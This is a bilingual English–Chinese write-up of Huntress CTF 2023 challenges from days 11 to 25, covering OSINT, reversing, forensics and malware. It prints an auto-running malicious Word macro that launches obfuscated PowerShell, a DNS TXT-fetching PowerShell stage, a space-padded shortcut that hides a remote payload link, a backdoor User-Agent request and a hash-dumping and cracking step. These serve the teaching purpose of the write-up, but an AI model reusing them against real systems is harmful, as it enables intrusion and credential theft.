使用 Google 进行反向图像查找将产生建筑物的名称:佐治亚理工学院:普莱斯吉尔伯特图书馆。快速的谷歌地图搜索将显示建筑物的确切位置,并将标记放在该位置会导致旗帜。

The flag was: flag{c46b7183c9810ec4ddb31b2fdc6a914c}
标志是:flag{c46b7183c9810ec4ddb31b2fdc6a914c}

Snake Eater on the other hand was a malware challenge. The easy way of obtaining the flag was to calculate the md5 or sha256 sum of the file and then locate it on VirusTotal. You’d find the flag under “Behavior” as part of “Files Written” or “Files Deleted”.
另一方面,Snake Eater 是一个恶意软件挑战。获取标志的简单方法是计算文件的 md5 或 sha256 总和,然后在 VirusTotal 上找到它。您会在“行为”下找到该标志,作为“写入的文件”或“已删除的文件”的一部分。

The other, more fun, way was to detonate it and use a tool such as Process Monitor from the Sysinternals suite.
另一种更有趣的方法是引爆它并使用 Sysinternals 套件中的进程监视器等工具。

Huntress CTF 2023 — Write-up
Output from Process Monitor.
进程监视器的输出。

The flag was obtained using the following filters:
该标志是使用以下筛选器获取的:

  • Process Name is snake_eater.exe
    进程名称为 snake_eater.exe
  • Path contains flag{ 路径包含标志{

The flag was: flag{d1343a2fc5d8427801dd1fd417f12628}
标志是:flag{d1343a2fc5d8427801dd1fd417f12628}

And this concluded the 11th day.
第11天就这样结束了。

DAY 12 第12天

Day 12 challenges were: 第12天的挑战是:

  • Under The Bridge 桥下
  • Opendir

Under The Bridge was a continuation of the OSINT challenge from day 11. You were again given a location that needed to be tracked down. This time the location contained the following building:
《Under The Bridge》是 OSINT 挑战赛第 11 天的延续。你再次得到了一个需要追踪的位置。这次的位置包含以下建筑物:

Huntress CTF 2023 — Write-up
Image from the OSINT challenge.
图片来自 OSINT 挑战赛。

A quick image look-up resulted in an office that is to be leased with the address of 151 Freston Road, Notting Hill. A quick image look-up resulted in an office that is to be leased with the address of 151 Freston Road, Notting Hill. Putting down the marker at that address resulted in the flag.
快速的图像查找产生了一个办公室,该办公室将出租,地址为诺丁山弗雷斯顿路 151 号。快速的图像查找产生了一个办公室,该办公室将出租,地址为诺丁山弗雷斯顿路 151 号。在该地址放下标记会导致旗帜。

The flag was: flag{fdc8cd4cff2c19e0d1022e78481ddf36}
标志是:flag{fdc8cd4cff2c19e0d1022e78481ddf36}

Opendir was a container which was an open directory attributed to a threat actor. To obtain the flag you needed to download the whole directory using a command like:
Opendir 是一个容器,它是归因于威胁参与者的开放目录。要获取标志,您需要使用如下命令下载整个目录:

wget --user=opendir --password=opendir --recursive --level 5 http://chal.ctf.games:31407/

Then use grep to obtain the flag:
然后用于 grep 获取标志:

Huntress CTF 2023 — Write-up
The -r option tells grep to recursively search for the pattern starting in a directory you specify.
-r 选项告诉 grep 以递归方式搜索从您指定的目录开始的模式。

The flag was: flag{9eb4ebf423b4e5b2a88aa92b0578cbd9}
标志是:flag{9eb4ebf423b4e5b2a88aa92b0578cbd9}

With that day 12 was finished
随着那天12结束

Day 13 第13天

Day 13 challenges were: 第13天的挑战是:

  • Opposable Thumbs 相对的拇指
  • Land Before Time 提前降落

Opposable Thumbs was a thumbcache_256.db file. You needed to use a thumbcache parser, like this one, to obtain the flag. The flag was visible once you hid all the blank entries and checked each file.
Opposable Thumbs 是一个thumbcache_256.db文件。您需要使用拇指缓存解析器(如本解析器)来获取标志。一旦您隐藏了所有空白条目并检查了每个文件,该标志就可见了。

Huntress CTF 2023 — Write-up
The flag was in the only file with the .jpg extension.
该标志位于唯一扩展名为 .jpg 的文件中。

The flag was: flag{human_after_all}
标志是:flag{human_after_all}

Land Before Time was a steganography challenge, ‘nuff said. At least the creator mentioned which tool to use: iSteg. I found this GitHub repository with a java implementation of the tool and used it. I left the password value blank, when I was prompted, and got the flag.
Land Before Time 是一个隐写术挑战,“说得够多了。至少创建者提到了使用哪个工具:iSteg。我找到了这个带有该工具的 java 实现的 GitHub 存储库并使用它。当我出现提示时,我将密码值留空,并得到了标志。

Huntress CTF 2023 — Write-up
Easy life. 轻松的生活。

The flag was: flag{da1e2bf9951c9eb1c33b1d2008064fee}
标志是:flag{da1e2bf9951c9eb1c33b1d2008064fee}

And this concluded day 13.
第13天就这样结束了。

Day 14 第14天

Day 14 challenges were: 第14天的挑战是:

  • Rock, Paper, Psychic 岩石, 纸, 通灵
  • Tragedy Redux 悲剧 Redux

Rock, Paper, Psychic was a fun reversing challenge. The challenge binary played rock, paper, scissors against you, the twist being that it read your input and then decided on its choice, meaning you’d never actually win. To win you’d need to manipulate the memory of the program, and no better tool for that than Cutter.
Rock, Paper, Psychic 是一个有趣的逆转挑战。挑战二进制对你玩石头、剪刀布,转折点是它读取你的输入,然后决定它的选择,这意味着你永远不会真正赢。要想获胜,你需要操纵程序的内存,没有比 Cutter 更好的工具了。

Huntress CTF 2023 — Write-up
When opening the file in Cutter make sure to enable “write mode”.
在 Cutter 中打开文件时,请确保启用“写入模式”。

The first step to finding the flag was filtering the function names for functions containing “flag” in them. This resulted in a function named “printFlag”, the next step was to use Cutter to cross-reference where the function was called. This could be achieved by right-clicking on the “printFlag” function and choosing “Show X-Refs”.
查找标志的第一步是筛选包含“flag”的函数的函数名称。这导致了一个名为“printFlag”的函数,下一步是使用 Cutter 交叉引用调用该函数的位置。这可以通过右键单击“printFlag”函数并选择“Show X-Refs”来实现。

Huntress CTF 2023 — Write-up
The printFlag function and the cross-reference for it.
printFlag 函数及其交叉引用。

Double-clicking on the function led to a new function called “playerWins”. When cross-referenced, the “playerWins” function led to the “main” function.
双击该函数会生成一个名为“playerWins”的新函数。交叉引用时,“playerWins”函数导致“main”函数。

Huntress CTF 2023 — Write-up
The “playerWins” function inside “main”.
“main”中的“playerWins”函数。

The “playerWins” function is only called if the zero flag is set. The flag is set by the “test” instruction, which performs a bitwise AND on the two operands. If the result is 0, the ZF flag is set to 1, otherwise it’s set to 0. The “jnz” instruction, on the other hand, jumps to the memory location if the ZF flag is 0.
仅当设置了零标志时,才会调用“playerWins”函数。该标志由“test”指令设置,该指令对两个操作数执行按位 AND。如果结果为 0,则 ZF 标志设置为 1,否则设置为 0。另一方面,如果 ZF 标志为 0,则“jnz”指令会跳转到内存位置。

To get the flag you’d have to alter the value of the register “al” to any non zero value.
要获得标志,您必须将寄存器“al”的值更改为任何非零值。

To actually alter the register you’d set a breakpoint at the “test” instruction and run the binary via Cutter. Once at the breakpoint, all you had to do was alter the “rax” register and continue the execution flow. Finally, the flag would be printed to the screen.
要实际更改寄存器,您需要在“测试”指令中设置一个断点,并通过 Cutter 运行二进制文件。到达断点后,您所要做的就是更改“rax”寄存器并继续执行流程。最后,旗帜将被打印到屏幕上。

Huntress CTF 2023 — Write-up
Here you can see the breakpoint, the RAX register, and the flag.
在这里,您可以看到断点、RAX 寄存器和标志。

The flag was: flag{35bed450ed9ac9fcb3f5f8d547873be9}
标志是:flag{35bed450ed9ac9fcb3f5f8d547873be9}

Tragedy Redux was a malicious word document with a VBA macro. The first step was to dump the VBA code with oledump.py :
Tragedy Redux 是一个带有 VBA 宏的恶意 Word 文档。第一步是转 oledump.py 储VBA代码:

oledump.py -s a -v word/vbaProject.bin

This resulted in the following code:
这导致了以下代码:

Attribute VB_Name = "NewMacros"
Function Pears(Beets)
    Pears = Chr(Beets - 17)
End Function

Function Strawberries(Grapes)
    Strawberries = Left(Grapes, 3)
End Function

Function Almonds(Jelly)
    Almonds = Right(Jelly, Len(Jelly) - 3)
End Function

Function Nuts(Milk)
    Do
    OatMilk = OatMilk + Pears(Strawberries(Milk))
    Milk = Almonds(Milk)
    Loop While Len(Milk) > 0
    Nuts = OatMilk
End Function


Function Bears(Cows)
    Bears = StrReverse(Cows)
End Function

Function Tragedy()

    Dim Apples As String
    Dim Water As String

    If ActiveDocument.Name <> Nuts("131134127127118131063117128116") Then
        Exit Function
    End If

    Apples = "129128136118131132121118125125049062118127116049091088107132106104116074090126107132106104117072095123095124106067094069094126094139094085086070095139116067096088106065107085098066096088099121094101091126095123086069106126095074090120078078"
    Water = Nuts(Apples)


    GetObject(Nuts("136122127126120126133132075")).Get(Nuts("104122127068067112097131128116118132132")).Create Water, Tea, Coffee, Napkin

End Function

Sub AutoOpen()
    Tragedy
End Sub
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Due to an error with the challenge, we had the source code used for the obfuscation:
由于质询的错误,我们使用了用于混淆的源代码:

def obfuscate(m):
    return "".join([ str((ord(x)+17)%255).zfill(3) for x in m ])

As can be seen, the code generates a part of the string by taking the ASCII value of the character, adding 17 to it, performing modulo 255 on it, and pads it with zeros until the length is 3.
可以看出,该代码通过获取字符的 ASCII 值,向其添加 17,对其执行取模 255,并用零填充直到长度为 3 来生成字符串的一部分。

The deobfuscation function was generated by ChatGPT:
去混淆函数由 ChatGPT 生成:

def deobfuscate(obfuscated):
    result = ''
    for i in range(0, len(obfuscated), 3):
        chunk = obfuscated[i:i+3]
        result += chr((int(chunk) - 17) % 255)
    return result

It divided the obfuscated string into segments of 3 characters and performed the inverse operation of the obfuscate function.
它将混淆后的字符串分成 3 个字符的段,并执行混淆函数的逆运算。

Running the deobfuscate function on the Apples string resulted in a PowerShell string with a base64 encoded command. Base64 decoding the command resulted in the flag.
对 Apples 字符串运行函数 deobfuscate 会生成具有 base64 编码命令的 PowerShell 字符串。Base64 解码命令导致标志。

The flag was: flag{63dcc82c30197768f4d458da12f618bc}
标志是:flag{63dcc82c30197768f4d458da12f618bc}

With this day 14 was finished.
这一天,14结束了。

Day 15 第15天

Day 15 challenges were: 第15天的挑战是:

  • Rogue Inbox 流氓收件箱
  • M Three Sixty Five — General Info
    M Three Sixty Five — 基本信息
  • M Three Sixty Five — Conditional Access
    M Three Sixty Five — 条件访问
  • M Three Sixty Five — Teams
    M Three Sixty Five — 团队
  • M Three Sixty Five — The President
    M Three Sixty Five — 总统

Rogue Inbox required you to parse a .csv file. The flag was hidden through web requests, where each request would contain one letter of the flag. There were multiple ways to obtain the flag. I used Sublime text and the following regex pattern:
流氓收件箱要求您解析 .csv 文件。该标志是通过 Web 请求隐藏的,其中每个请求将包含标志的一个字母。有多种方法可以获取该标志。我使用了 Sublime 文本和以下正则表达式模式:

^.*/(?!f757cb79\-dd91\-4555\-a45e\-520c2525d932\\\\.{1})*|(?<=f757cb79\-dd91\-4555\-a45e\-520c2525d932\\\\.{1}).*

I had and still have zero clue how to use regex so don’t judge the pattern too hard.
我曾经并且仍然不知道如何使用正则表达式,所以不要太难判断模式。

The flag was: flag{24c4230fa7d50eef392b2c850f74b0f6}
标志是:flag{24c4230fa7d50eef392b2c850f74b0f6}

M Three Sixty Five was a group of challenges focused on Azure AD. The challenge would load the AADInternals tool when connecting to the container, which is a big hint on how to do the challenge. All the challenges could be solved by reading the documentation for the tool and finding the correct command.
M Three Sixty Five 是一组专注于 Azure AD 的挑战。该挑战将在连接到容器时加载 AADInternals 工具,这是有关如何执行挑战的重要提示。通过阅读该工具的文档并找到正确的命令,可以解决所有挑战。

The first challenge required you to find the street address associated with the organization. This could be achieved via the following command: Get-AADIntTenantDetails .
第一个挑战要求您找到与组织关联的街道地址。这可以通过以下命令实现: Get-AADIntTenantDetails .

The flag was: flag{dd7bf230fde8d4836917806aff6a6b27}
标志是:flag{dd7bf230fde8d4836917806aff6a6b27}

The next challenge required you to find an odd conditional access policy. For this you could use the following command: Get-AADIntConditionalAccessPolicies .
下一个挑战要求你找到一个奇怪的条件访问策略。为此,您可以使用以下命令: Get-AADIntConditionalAccessPolicies .

The flag was: flag{d02fd5f79caa273ea535a526562fd5f7}
标志是:flag{d02fd5f79caa273ea535a526562fd5f7}

The next challenge required you to find some messages exchanged through Microsoft Teams. For this you could use the following command: Get-AADIntTeamsMessages .
下一个挑战要求你找到一些通过 Microsoft Teams 交换的消息。为此,您可以使用以下命令: Get-AADIntTeamsMessages .

The flag was: flag{f17cf5c1e2e94ddb62b98af0fbbd46e1}
标志是:flag{f17cf5c1e2e94ddb62b98af0fbbd46e1}

The final challenge required you to find information left in the description of an user account. The targeted user account was the president of the organization. To find the flag you needed to run: Get-AADIntUsers | Select PhoneNumber, Department .
最后一个挑战要求您找到用户帐户描述中留下的信息。目标用户帐户是组织的总裁。要查找需要运行的标志,请执行以下操作: Get-AADIntUsers | Select PhoneNumber, Department 。

The flag was: flag{1e674f0dd1434f2bb3fe5d645b0f9cc3}
标志为:flag{1e674f0dd1434f2bb3fe5d645b0f9cc3}

With this day 15 was finished.
这一天15结束了。

DAY 16 第16天

Day 16 challenges were: 第16天的挑战是:

  • PRESS PLAY ON TAPE 按磁带播放
  • Babel 巴别塔

The PRESS PLAY ON TAPE challenge provided you with a .wav file. A quick Google search of the challenge name resulted in Danish band that uses Commodore 64 tunes. The fact that the challenge mentioned a cassette and the name of the challenge hints to Commodore 64 means that we originally had Commodore 64 cassette tape that was converted to a .wav file.
PRESS PLAY ON TAPE 挑战为您提供了一个 .wav 文件。在谷歌上快速搜索挑战名称,结果是丹麦乐队使用了 Commodore 64 曲调。挑战提到了盒式磁带,挑战的名称暗示了 Commodore 64,这意味着我们最初拥有转换为 .wav 文件的 Commodore 64 盒式磁带。

I found this tool, which would convert the .wav file back to a file format (in this case a .tap ) that a Commodore 64 can use. Loading the tape into this emulator (it can take a few seconds to start) would output the flag.
我找到了这个工具,它可以将 .wav 文件转换回 Commodore 64 可以使用的文件格式(在本例中为 a .tap )。将磁带加载到此仿真器中(可能需要几秒钟才能启动)将输出标志。

Huntress CTF 2023 — Write-up
The output of the .tap file when loaded.
加载时 .tap 文件的输出。

The flag was: flag{32564872d760263d52929ce58cc40071}
标志是:flag{32564872d760263d52929ce58cc40071}

Babel was a C# obfuscated script. As with previous challenges, we could use the script to deobfuscate itself by removing the following lines:
Babel 是一个 C# 混淆脚本。与之前的挑战一样,我们可以使用脚本通过删除以下行来对自身进行反混淆:

//MethodInfo nxLTRAWINyst = smlpjtpFegEH.EntryPoint;

//nxLTRAWINyst.Invoke(smlpjtpFegEH.CreateInstance(nxLTRAWINyst.Name), null);

And changing the following line:
并更改以下行:

Assembly smlpjtpFegEH = Assembly.Load(Convert.FromBase64String(zcfZIEShfvKnnsZ(pTIxJTjYJE, YKyumnAOcgLjvK)));

Into: 到:

Console.WriteLine(zcfZIEShfvKnnsZ(pTIxJTjYJE, YKyumnAOcgLjvK));

Plopping the edited script into this online C# compiler and running it resulted in base64 encoded output. Putting that base64 output into CyberChef and decoding it resulted in an executable. Downloading the executable and running strings on it resulted in the flag for this challenge.
将编辑后的脚本放入此在线 C# 编译器并运行它会产生 base64 编码的输出。将 base64 输出放入 CyberChef 并对其进行解码会产生可执行文件。下载可执行文件并在其上运行字符串导致了此质询的标志。

The flag was: flag{b6cfb6656ea0ac92849a06ead582456c}
标志是:flag{b6cfb6656ea0ac92849a06ead582456c}

This concluded day 16. 第16天就此结束。

Day 17 第17天

Day 17 challenges were: 第17天的挑战是:

  • Texas Chainsaw Massacre: Tokyo Drift
    德州电锯杀人狂:东京漂移
  • Indirect Payload 间接有效载荷

Texas Chainsaw Massacre: Tokyo Drift (say that three times fast) was a Windows Event Log file. The name of the challenge implied that we needed to use chainsaw for analysis. Chainsaw has the ability to search for powershell script block events and, in our case, filter for specific event IDs. The event log had an event ID 1337, which translates to “leet”.
Texas Chainsaw Massacre: Tokyo Drift(说快三倍)是一个 Windows 事件日志文件。挑战的名称暗示我们需要使用电锯进行分析.Chainsaw 能够搜索 powershell 脚本块事件,在我们的示例中,可以筛选特定事件 ID。事件日志的事件 ID 为 1337,转换为“leet”。

Huntress CTF 2023 — Write-up
Event ID 1337. 事件 ID 1337。

Running chainsaw on the log file resulted in a hexadecimal string. Decoding the string resulted in an obfuscated PowerShell script.
在日志文件上运行 chainsaw 会导致十六进制字符串。对字符串进行解码会导致 PowerShell 脚本出现模糊处理。

The PowerShell script was obfuscated using more complex techniques, so I resorted to a PowerShell deobfuscation tool. The script was deobfuscated using PowerDecode. The second stage payload looked like this:
PowerShell 脚本使用更复杂的技术进行模糊处理,因此我求助于 PowerShell 反混淆工具。使用 PowerDecode 对脚本进行反混淆处理。第二阶段有效载荷如下所示:

try {
    $TGM8A = Get-WmiObject MSAcpi_ThermalZoneTemperature -Namespace "root/wmi" -ErrorAction 'silentlycontinue' ;
     if ($error.Count -eq 0) {
      $5GMLW = (Resolve-DnsName eventlog.zip -Type txt | ForEach-Object { $_.Strings });
      Write-Host($5GMLW);
        if ($5GMLW -match '^[-A-Za-z0-9+/]*={0,3}$') { 
            Write-Host([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($5GMLW)))
            } 
        }
    } 
catch { }

Running the following line:
运行以下行:

Resolve-DnsName eventlog.zip -Type txt | ForEach-Object { $_.Strings }

resulted in a base64 encoded string, base64 decoding it resulted in the flag.
导致了一个 base64 编码的字符串,base64 解码它导致了标志。

The flag was: flag{409537347c2fae01ef9826c2506ac660}
标志是:flag{409537347c2fae01ef9826c2506ac660}

Indirect payload was more of a web challenge than anything. The data was hidden in the body of the redirect response. I made this one liner that would print the flag:
间接有效载荷更像是一个网络挑战。数据隐藏在重定向响应的正文中。我做了这个衬里,可以打印旗帜:

curl -L --max-redirs 80 http://chal.ctf.games:31430/site/flag.php -v 2>&1 | grep "GET" | awk -v OFS='' '{print "http://chal.ctf.games:31430",$3}' | for line in $(</dev/stdin); do curl -s $line; done | sed 's/.*is //' | tr -d '\n'

Since cURL won’t output the body of the response unless the URL is directly visited, the command first follows the redirects and outputs them so grep can be used to filter for the URL. Awk is used to join the two parts of the URL, which is then passed back to curl. Since this time, cURL directly visits the website, the body is shown, and after some formatting the flag is outputted.
由于除非直接访问 URL,否则 cURL 不会输出响应正文,因此该命令首先跟踪重定向并输出它们,以便可以使用 grep 来过滤 URL。Awk 用于连接 URL 的两个部分,然后将其传回 curl。从这个时候开始,cURL直接访问网站,显示正文,并在一些格式化后输出标志。

The flag was: flag{448c05ab3e3a7d68e3509eb85e87206f}
标志是:flag{448c05ab3e3a3a7d68e3509eb85e87206f}

This concluded day 17. 第17天到此结束。

Day 18 第18天

Day 18 challenges were: 第18天的挑战是:

  • Who is Real? 谁是真实的?
  • Thumb Drive 拇指驱动器

Who is Real? was a game where you had to choose between an image of an actual person and an image of a person generated by AI.
谁是真实的?是一款游戏,您必须在真实人物的图像和 AI 生成的人物图像之间进行选择。

Huntress CTF 2023 — Write-up
Example of a test 测试示例

The challenge was fun and novel, but the implementation left things to be desired. First of all, the correct image was always on right side of the page. Secondly the website was vulnerable to a race condition where if you pressed one image multiple times it would be counted as multiple correct guesses, leading to this:
挑战既有趣又新颖,但实施过程仍有待改进。首先,正确的图像始终位于页面的右侧。其次,该网站容易受到竞争条件的影响,如果您多次按下一张图片,它将被视为多个正确猜测,从而导致以下情况:

Huntress CTF 2023 — Write-up
It is what it is…
它就是这样……

The flag was: flag{10c0e4ed5fcc3259a1b0229264961590}
标志是:flag{10c0e4ed5fcc3259a1b0229264961590}

Thumb Drive was a malicious shortcut ( .lnk ) file. If inspected quickly, it wouldn’t seem malicious as it would only appear to open cmd.exe.
拇指驱动器是一个恶意的快捷方式 ( .lnk ) 文件。如果快速检查,它似乎不会是恶意的,因为它只会打开 cmd.exe。

Huntress CTF 2023 — Write-up
Nothing malicious…or is it?
没有恶意…或者是吗?

Thumb Drive was a mallicious shortcut (.lnk) file. If inspected quickly, it wouldn’t seem malicious as it would only appear to open cmd.exe. However, as pointed out by this McAfee blog, the target path property can only display 255 characters, while command line arguments can be up to 4096 characters. An attacker could pad out the 255 characters with blank spaces and then provide the malicious command.
拇指驱动器是一个恶意的快捷方式(.lnk)文件。如果快速检查,它似乎不会是恶意的,因为它只会打开 cmd.exe。但是,正如此 McAfee 博客所指出的,目标路径属性只能显示 255 个字符,而命令行参数最多可以显示 4096 个字符。攻击者可以用空格填充 255 个字符,然后提供恶意命令。

The utility strings was used to see all strings inside the shortcut file:
该实用程序 strings 用于查看快捷方式文件中的所有字符串:

$ strings ADATA_128GB.lnk -e l
Windows
System32
cmd.exe
ADATA 128GB



        /V/R    CMD<https://tinyurl.com/a7ba6ma
%windir%\System32\cmd.exe
S-1-5-21-394609149-2801146648-1994955949-3002

Make note of the -e option which is used to print out Unicode strings. The link led to a Google Drive containing a text file that was base32 encoded. Base32 decoding the text resulted in a dll.
记下用于打印 Unicode 字符串的 -e 选项。该链接指向一个 Google 云端硬盘,其中包含一个 base32 编码的文本文件。Base32 对文本进行解码会生成 dll。

To actually obtain the flag, you needed to run the dll with rundll32.exe and provide any function as an entry point.
若要实际获取标志,需要运行 rundll32.exe dll 并提供任何函数作为入口点。

Huntress CTF 2023 — Write-up
The flag 🙂 . 旗帜:)。

The flag was: flag{0af2873a74cfa957ccb90cef814cfe3d}
标志是:flag{0af2873a74cfa957ccb90cef814cfe3d}

This concluded day 18. 第18天到此结束。

Day 19 第19天

Day 19 challenges were: 第19天的挑战是:

  • Speakfriend Speakfriend的
  • Operation Eradication 根除行动

Speakfriend was a “malware” challenge. It provided a compromised website and a binary that is associated with it. Opening the binary in Cutter resulted in an interesting string.
Speakfriend是一个“恶意软件”挑战。它提供了一个受感染的网站和与之关联的二进制文件。在 Cutter 中打开二进制文件会产生一个有趣的字符串。

Huntress CTF 2023 — Write-up
This appears to be a User-Agent string.
这似乎是一个User-Agent字符串。

While the picture might depict a User-Agent string, it, by all means, isn’t ordinary. Hackers have in the past used custom User-Agent strings to access backdoors left during the initial compromise.
虽然这张图片可能描绘了一个User-Agent字符串,但无论如何,它并不普通。黑客过去曾使用自定义User-Agent字符串来访问最初入侵期间留下的后门。

To access the flag, you had to provide the User-Agent string like this:
要访问该标志,您必须提供 User-Agent 字符串,如下所示:

curl https://chal.ctf.games:32479/ -H "User-Agent: Mozilla/5.0 93bed45b-7b70-4097-9279-98a4aef0353e" -k -L

The flag was: flag{3f2567475c6def39501bab2865aeba60}
标志是:flag{3f2567475c6def39501bab2865aeba60}

For Operation Eradication I suggest checking this write-up by GoProSlowYo.
对于根除行动,我建议查看 GoProSlowYo 的这篇文章。

This concluded day 19. 第19天到此结束。

Day 20 第20天

Day 20 challenges were: 第20天的挑战是:

  • RAT 
  • Welcome to the Park 欢迎来到公园

The easy way of obtaining the flag for the RAT challenge was to calculate the sha256 sum of it and look it up on VirusTotal.
获取 RAT 质询标志的简单方法是计算其 sha256 总和并在 VirusTotal 上查找。

Huntress CTF 2023 — Write-up
The flag is visible under the behavior tab.
该标志在“行为”选项卡下可见。

The flag was: flag{8b988b859588f2725f0c859104919019}
标志是:flag{8b988b859588f2725f0c859104919019}

While unzipping the challenge file for Welcome to the Park, I noticed a file under welcome/.hidden/welcomeToThePark . Running the file utility on it resulted with a Mach-O file:
在解压缩 Welcome to the Park 的挑战文件时,我注意到 welcome/.hidden/welcomeToThePark 下有一个文件。在其上运行该 file 实用程序会得到一个 Mach-O 文件:

$ file welcome/.hidden/welcomeToThePark
welcome/.hidden/welcomeToThePark: Mach-O 64-bit arm64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|PIE>

The result, paired with the hint that something was hiding amongst “Mach-O” files, led me to run strings on the mentioned file.
结果,再加上“Mach-O”文件中隐藏着某些东西的提示,导致我在提到的文件上运行字符串。

Strings found a base64 encoded string inside the binary. Base64 decoding the string resulted in an obfuscated XML script.
字符串在二进制文件中找到了一个 base64 编码的字符串。对字符串进行 Base64 解码会导致 XML 脚本出现模糊处理。

The XML script contained a link to https://gist.github.com/stuartjash/a7d187c44f4327739b752d037be45f01 , which in turn contained a picture named JohnHammond.png. Downloading the file and running strings on it resulted in the flag.
XML脚本包含一个指向 https://gist.github.com/stuartjash/a7d187c44f4327739b752d037be45f01 的链接,而该链接又包含一个名为JohnHammond.png的图片。下载文件并在其上运行字符串会导致标志。

Huntress CTF 2023 — Write-up
JohnHammond.png 约翰·哈蒙德.png

The flag was: flag{680b736565c76941a364775f06383466}
标志是:flag{680b736565c76941a364775f06383466}

This concluded day 20. 第20天就此结束。

DAY 21 第21天

The day 21 challenge was:
第21天的挑战是:

  • Snake Oil 蛇油

The Snake Oil challenge could be done in two ways. The first (easy) way was similar to the challenge of the previous day: calculate the sha256 sum, find it on VirusTotal, under “Community” find a link to the following Triage report, and you’d have the flag.
蛇油挑战可以通过两种方式完成。第一种(简单的)方法与前一天的挑战类似:计算 sha256 总和,在 VirusTotal 上找到它,在“社区”下找到指向以下 Triage 报告的链接,您就会得到标志。

The hard way required you to reverse the binary from its exe format to its semi-original Python source code. The first step in that process was to use the following GitHub script to extract the pyc code. The pyc code is the compiled bytecode of the original Python script. You can then take that bytecode and use this tool to restore it to its source code.
艰难的方法需要您将二进制文件从其 exe 格式反转为半原始的 Python 源代码。该过程的第一步是使用以下 GitHub 脚本提取 pyc 代码。pyc 代码是原始 Python 脚本的编译字节码。然后,您可以获取该字节码并使用此工具将其还原到其源代码。

Restoring the brain-melt file resulted in the following code:
还原 brain-melt 文件生成以下代码:

def decrypt(s1, s2):
    return ''.join((lambda .0: [ chr(ord(c1) ^ ord(c2)) for c1, c2 in .0])(zip(s1, s2)))

def deobfuscate():
    part1 = '2ec7627d{galf'[::-1]
    part2 = str(base64.b64decode('NjIwM2I1Y2M2OWY0'.encode('ascii')), 'UTF8')
    part3 = decrypt('\x17*\x07`BC\x14*R@\x14^*', 'uKeVuzwIexplW')
    key = part1 + part2 + part3
    return key

The decompiler did a good job, although, for the code to execute you needed to alter the lambda name to something that doesn’t contain a dot. Something like this would work:
反编译器做得很好,但是,要执行代码,您需要将 lambda 名称更改为不包含点的名称。像这样的东西会起作用:

def decrypt(s1, s2):
    return ''.join((lambda my_func: [ chr(ord(c1) ^ ord(c2)) for c1, c2 in my_func])(zip(s1, s2)))

Running the corrected code resulted in the flag.
运行更正后的代码会导致该标志。

The flag was: flag{d7267ce26203b5cc69f4bab679cc78d2}
标志是:flag{d7267ce26203b5cc69f4bab679cc78d2}

With this day 21 was finished.
这一天,21结束了。

Day 22 第22天

The day 22 challenge was:
第22天的挑战是:

  • Batchobfuscation 批处理混淆

Batchobfuscation was an obfuscated batch script, as the name would suggest. The challenge was tedious since it required searching and replacing strings to start seeing the flag. The flag had to be reconstructed, which also was a PITA.
顾名思义,Batchobfuscation 是一个混淆的批处理脚本。这个挑战很乏味,因为它需要搜索和替换字符串才能开始看到标志。这面旗帜必须重建,这也是一个PITA。

This Huntress article explains the method used in the malware better than I ever could. It also explains how to reverse it, which was the main method I used to deobfuscate the script.
这篇 Huntress 文章比我更好地解释了恶意软件中使用的方法。它还解释了如何反转它,这是我用来对脚本进行反混淆的主要方法。

The flag was : flag{acad67e3d0b5bf31ac6639360db9d19a}
标志是:flag{acad67e3d0b5bf31ac6639360db9d19a}

This concluded day 22. 第22天就此结束。

Day 23 第23天

The day 23 challenge was:
第23天的挑战是:

  • Bad Memory 内存不良

Bad Memory was a memory capture of a Windows machine. The challenge required finding the password of a user. This task could be accomplished by using Volatility 3. The user hashes can be extracted from the memory image with the following command:
Bad Memory 是 Windows 计算机的内存捕获。挑战需要找到用户的密码。可以使用波动率 3 来完成此任务。可以使用以下命令从内存映像中提取用户哈希值:

vol3 -f image/image.bin windows.hashdump.Hashdump

The extracted hashes were:
提取的哈希值为:

User    rid     lmhash  nthash

Administrator   500     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59d7e0c089c0
Guest   501     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount  503     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount      504     aad3b435b51404eeaad3b435b51404ee        4cff1380be22a7b2e12d22ac19e2cdc0
congo   1001    aad3b435b51404eeaad3b435b51404ee        ab395607d3779239b83eed9906b4fb92

We see only one hash for a user account. Putting the NT hash for that user into CrackStation resulted in the password goldfish# . Converting the password to an md5 hash and wrapping it with flag{} was the solution for the challenge.
我们只看到一个用户帐户的一个哈希值。将该用户的NT哈希值放入CrackStation中会导致密码 goldfish# 。将密码转换为 md5 哈希并用 flag{} 包装它是解决这一挑战的解决方案。

The flag was: flag{2eb53da441962150ae7d3840444dfdde}
标志是:flag{2eb53da441962150ae7d3840444dfdde}

This concluded day 23. 第23天就此结束。

Day 24 第24天

The day 24 challenge was:
第24天的挑战是:

  • Discord Snowflake Scramble
    Discord 雪花争夺战

This challenge required you to find a flag hidden on a discord server. You were given the following link: https://discord.com/channels/1156647699362361364/1156648139516817519/1156648284237074552.
这个挑战要求你找到一个隐藏在discord服务器上的标志。您获得了以下链接:https://discord.com/channels/1156647699362361364/1156648139516817519/1156648284237074552。

The challenge name hinted at “snowflakes”, which are unique IDs that Discord uses to identify everything from a channel to a message that was sent.
挑战名称暗示了“雪花”,这是 Discord 用来识别从频道到发送的消息的所有内容的唯一 ID。

Luckily, there is the following website that takes the “snowflake” and returns the corresponding channel. Inputting the first “snowflake” from the link above resulted in a Discord channel, which, when joined, displayed the flag.
幸运的是,有以下网站将“雪花”并返回相应的频道。从上面的链接中输入第一个“雪花”会产生一个 Discord 频道,该频道在加入时会显示该标志。

The flag was: flag{bb1dcf163212c54317daa7d1d5d0ce35}
标志是:flag{bb1dcf163212c54317daa7d1d5d0ce35}

This concluded day 24. 第24天就此结束。

Day 25 第25天

The day 25 challenge was:
第25天的挑战是:

  • BlackCat 黑猫

BlackCat was a malware challenge that required reversing. You were provided with a decrypt tool and the following note:
BlackCat 是一个需要逆转的恶意软件挑战。为您提供了解密工具和以下注释:

Huntress CTF 2023 — Write-up
This is Cosmo, say hi 🙂
我是Cosmo,打个招呼:)
